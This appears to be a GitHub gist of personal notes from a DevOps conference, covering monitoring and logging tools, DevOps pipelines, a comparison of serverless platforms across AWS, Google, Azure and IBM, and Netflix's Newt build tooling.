Swarm3k - Experiment with Docker Swarm (The community provides nodes to the swarm)

Logs have to be rotated so that the disk doesnt get full

In Java exposing the JMX interface

Summary

  • Setup of monitoring and logging is complex in dynamic environments!!!!
  • Smart Agents to collect, parse, etc. logs!!!

12:00 - 13:00 - DevOps – Dev first, Ops last?

Current State of DevOps

DevOps Pipeline today

  • VCS > CI > CD (Delivery + Deployment) > Production

Book for Unit Testing: "Growing Object-Oriented Software, Guided by Tests"

Pipeline State UFO - A Lamp that indicates the current pipeline state :D

Production

  • Regression Tests

Book: "Building Microservices"

Platform-as-a-Service

  • Kubernetes, ...

Open-Source

  • Logging
    • ELK
  • Call-Tracing
    • AWS X-Ray, Zipkin
  • Monitoring
    • Infrastructure: Nagios
    • For single technologies: java, ...
  • Charting and dashboarding
    • Grafana
    • Kibana

@MartinGoodwell

14:15 - 14:45 - Failure as “Success”: the Mindset, the Methods, and the Landmines

@jpaulreed

15:00 - 16:00 - The State of Serverless

Serverless - Like | in Unix

  • (re)volution of the cloud
  • Don't operate on Server level --> We operate on functional level
  • Abstraction of the runtime
  • Costs scale with usage --> never pay for idle
  • No Server/container/process management
  • auto-scale/auto-provision
  • global availability

Abstractions

  1. Bare Metal
  2. IaaS
  3. PaaS
  4. Functions

Function-as-a-Service

  • is event-driven

Backend-as-a-Service

Use cases

  • Data Processing
  • Back-end services / web apps / IoT
  • Infrastructure Automation

Challenges

  • Functions are like microservices but smaller
  • Monitoring + Logging
  • Debugging + Diagnostics
  • Local Development
  • vendor lock-in
  • Latency + Cold start

Providers

  • AWS
  • Azure
  • ...

AWS - Lambda

  • Runtimes
    • Node.js
    • Java
    • Python
    • C#
  • Events
    • ...
  • Monitoring + Logging
    • Logs + Metrics pushed to CloudWatch
    • ...
  • Debugging + Diagnostics
    • X-Ray - Shows us the visual function calls in a graph
  • Local Development
    • No Tool from AWS
    • There is a project on github to do this
  • Ecosystem
    • Step functions
      • Creating workflows - Can be described visually in the UI
      • Coordinate functions

Google Cloud Functions

  • Runtimes
    • Node.js
  • Events
    • HTTP request
    • Cloud Pub/Sub
    • ...
  • Monitoring + Logging
    • Logs and Metrics pushed to Stackdriver Logging
    • ...
  • Debugging + Diagnostics
    • Debugging with Stackdriver Debugger
  • Local Development
    • Cloud Functions Local Emulator
  • Ecosystem
    • Cloud Functions for Firebase

Microsoft Azure

  • Runtimes
    • Node
    • C#
    • ...
  • Events
    • Http Requests
    • Schedule
    • Azure stuff
  • Monitoring + Logging
    • Logs and metrics are pushed to Application Insight
    • ...
  • Debugging + Diagnostics
    • Debugging via local Visual Studio
  • Ecosystem
    • Logic Apps

IBM - Open Source project

  • Runtimes
    • Node.js
    • Swift
    • ...
    • anything via Docker
  • Events
    • HTTP Requests
    • Github events
    • ...

Functions on Kubernetes

  • Kubeless
  • Fission
  • Funktion

FaunaDB

  • DB
  • From the team that scales Twitter
  • global consistency
  • Pay for actual usage

Serverless (company)

  • Offers a CLI
  • A Framework
  • Serverless.yaml file
  • serverless deploy
    • Different Providers

@mthenw

16:30 - 17:30 - The Rise of Polyglot at Netflix

polyglot - multiple languages

Nebula OSPackage - Turns Java app into an debian package

Newt - Netflix Workflow Toolkit

  • CLI in Golang
  • newt package
  • `newt setup``
  • .newt.yml
app-type: node-beta
build-step: newt exec npm run-script build
tool-versions:
  node: 6.9.1
  npm: 3.10.8
  • alias npm="newt exec npm --"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment